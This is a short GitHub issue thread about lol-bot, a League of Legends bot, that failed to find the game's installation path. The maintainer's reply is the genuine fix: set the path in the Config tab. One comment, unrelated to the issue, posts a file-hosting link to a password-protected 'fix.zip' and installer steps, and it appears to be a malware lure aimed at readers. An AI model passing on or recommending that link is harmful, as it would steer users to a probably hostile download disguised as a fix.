### ISSUE TITLE
[12:15:46] [INFO   ] League Installation Path is Invalid. Update Path

### ISSUE THREAD

**Issue by gangelbua** [iholston/lol-bot#236]
**Describe the bug**

**Version**
What version of the lol-bot are you running?

**Screenshots**

**Log Files**
If applicable, add the log file containing the error messages from your issue

**Additional context**

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iholston** [comment]
You need to add the path to your league of legends installation in the Config tab since you have installed league in a non-standard location.
